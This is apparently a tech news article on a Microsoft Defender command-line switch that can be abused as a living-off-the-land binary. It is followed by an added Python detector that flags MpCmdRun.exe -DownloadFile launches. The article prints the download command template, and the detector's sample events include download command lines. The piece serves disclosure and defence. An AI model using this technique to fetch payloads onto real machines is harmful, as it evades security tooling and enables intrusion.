Windows 10 Antivirus Could Be Used To Download Malware




4 years ago


A recent Microsoft Defender update means the Windows 10 antivirus software could have been used as a vessel through which to download malicious files from the web.

According to penetration tester Mohammad Askar, changes to the Microsoft Defender command line tool could allow attackers to use the software as a living-off-the-land binary (LOLBin).

Numerous LOLBins are present in Windows 10, all of which serve a legitimate function.


However, with the right privileges, hackers can abuse these binaries to bypass security facilities and conduct attacks without alerting the victim.


As noted by Askar, the Microsoft Defender command line tool now supports a new "-DownloadFile" function. The change is thought to have taken effect with Microsoft Defender version 4.18.2007.9 or 4.18.2009.9.

As a result, an attacker on a local network could use the Microsoft Antimalware Service Command Line Utility to download a file from the internet with the following command: "MpCmdRun.exe -DownloadFile -url <url> -path <local-path>".

Using this technique, Askar was able to download Cobalt Strike malware from a remote location directly via Microsoft Defender.

While Defender will detect and mitigate any malicious files downloaded using this method, it is unclear whether other popular antivirus services will be able to defend against this avenue of attack, in instances in which native protections have been disabled.

System administrators are advised to update their watchlists to include the new LOLBin, to ensure it is not used to mount an attack.
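One way to turn that watchlist advice into a check, as an added example that is not part of the original article: the function below scans process-creation events for MpCmdRun.exe started with the -DownloadFile switch and pulls out the -url and -path values. It assumes events exported as dictionaries using Sysmon Event ID 1 field names (Image, CommandLine, OriginalFileName, Computer); the sample events are constructed, and matching the switch case-insensitively is a conservative assumption.

```python
import ntpath
import re

# Constructed events shaped like Sysmon Event ID 1 records; all values made up.
SAMPLE_EVENTS = [
    {"Computer": "ws01",
     "Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "CommandLine": "MpCmdRun.exe -Scan -ScanType 1"},
    {"Computer": "ws02",
     "Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "CommandLine": r'MpCmdRun.exe -DownloadFile -url https://example.test/a.bin'
                    r' -path "C:\Users\Public\a.bin"'},
    # Renamed copy: only the OriginalFileName field still identifies the binary.
    {"Computer": "ws03",
     "Image": r"C:\Users\Public\update.exe",
     "OriginalFileName": "MpCmdRun.exe",
     "CommandLine": r"update.exe -downloadfile -URL http://example.test/b -path C:\Temp\b"},
    # Unrelated process whose argument merely contains the switch text.
    {"Computer": "ws04",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\notes\MpCmdRun -DownloadFile.txt"},
]

SWITCH = re.compile(r"(?<!\S)-downloadfile(?!\S)", re.IGNORECASE)

def arg_value(cmdline, name):
    """Return the value following -<name>, with surrounding quotes removed."""
    m = re.search(r'(?<!\S)-' + re.escape(name) + r'\s+("[^"]*"|\S+)', cmdline, re.IGNORECASE)
    return m.group(1).strip('"') if m else None

def is_mpcmdrun(event):
    """Match on the image file name or, for renamed copies, OriginalFileName."""
    names = {ntpath.basename(event.get("Image", "")).lower(),
             event.get("OriginalFileName", "").lower()}
    return "mpcmdrun.exe" in names

def find_defender_downloads(events):
    """Flag MpCmdRun.exe process creations that use the -DownloadFile switch."""
    hits = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        if is_mpcmdrun(ev) and SWITCH.search(cmd):
            hits.append({"host": ev.get("Computer"), "image": ev.get("Image"),
                         "url": arg_value(cmd, "url"), "path": arg_value(cmd, "path")})
    return hits

if __name__ == "__main__":
    for hit in find_defender_downloads(SAMPLE_EVENTS):
        print(hit)
```

Routine scans (ws01) and unrelated processes that only mention the switch text (ws04) are not flagged, which keeps the rule quiet enough to alert on.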

TechRadar Pro has asked Askar to advise on how individual users should set about protecting themselves but is yet to receive a response.
